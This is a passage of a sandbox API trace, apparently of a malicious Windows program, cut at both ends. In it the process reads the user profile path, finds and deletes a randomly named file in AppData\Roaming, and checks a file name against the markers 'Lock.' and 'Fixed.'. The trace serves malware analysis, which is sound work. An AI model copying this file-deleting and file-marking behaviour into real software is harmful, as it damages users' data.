lpMsg=0x8cf4a8) returned 0 [0152.142] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.142] CloseHandle (hObject=0x4a4) returned 1 [0152.144] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.144] CloseHandle (hObject=0x4f8) returned 1 [0152.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.148] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.148] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.148] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0152.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0152.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0152.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0152.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a68440 [0152.149] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/WvHidWJPV.m4a", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\WvHidWJPV.m4a", lpFilePart=0x8cedf4*="WvHidWJPV.m4a") returned 0x2d [0152.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0152.149] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\WvHidWJPV.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\wvhidwjpv.m4a")) returned 0x20 [0152.149] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\WvHidWJPV.m4a", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2812260, ftCreationTime.dwHighDateTime=0x1d5d6c2, ftLastAccessTime.dwLowDateTime=0xd82c4380, ftLastAccessTime.dwHighDateTime=0x1d5d26f, ftLastWriteTime.dwLowDateTime=0xd82c4380, ftLastWriteTime.dwHighDateTime=0x1d5d26f, nFileSizeHigh=0x0, nFileSizeLow=0x175f2, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="WvHidWJPV.m4a", cAlternateFileName="WVHIDW~1.M4A")) returned 0x9e1d38 [0152.150] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\WvHidWJPV.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\wvhidwjpv.m4a")) returned 1 [0152.159] FindNextFileW (in: hFindFile=0x9e1d38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2812260, ftCreationTime.dwHighDateTime=0x1d5d6c2, ftLastAccessTime.dwLowDateTime=0xd82c4380, ftLastAccessTime.dwHighDateTime=0x1d5d26f, ftLastWriteTime.dwLowDateTime=0xd82c4380, ftLastWriteTime.dwHighDateTime=0x1d5d26f, nFileSizeHigh=0x0, nFileSizeLow=0x175f2, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="WvHidWJPV.m4a", cAlternateFileName="WVHIDW~1.M4A")) returned 0 [0152.159] FindClose (in: hFindFile=0x9e1d38 | out: hFindFile=0x9e1d38) returned 1 [0152.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0152.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0152.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.159] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0152.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0152.160] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0152.160] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0152.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0152.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0152.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0152.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0152.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0152.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0152.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0152.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0152.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0152.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a68440 [0152.161] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/WvHidWJPV.m4a", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\WvHidWJPV.m4a", lpFilePart=0x8cf650*="WvHidWJPV.m4a") returned 0x2d [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0152.161] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\WvHidWJPV.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\wvhidwjpv.m4a")) returned 0xffffffff [0152.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0152.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0152.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0152.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0152.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0152.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0152.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0152.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0152.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xin7s.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="in7s.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n7s.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7s.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0152.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0152.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0152.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0152.163] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0152.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0152.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0152.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0152.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xin7s.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="in7s.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n7s.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0152.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7s.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0152.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0152.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0152.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0152.164] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0152.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0152.164] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0152.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0152.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0152.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0152.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0152.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0152.165] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0152.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0152.165] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: 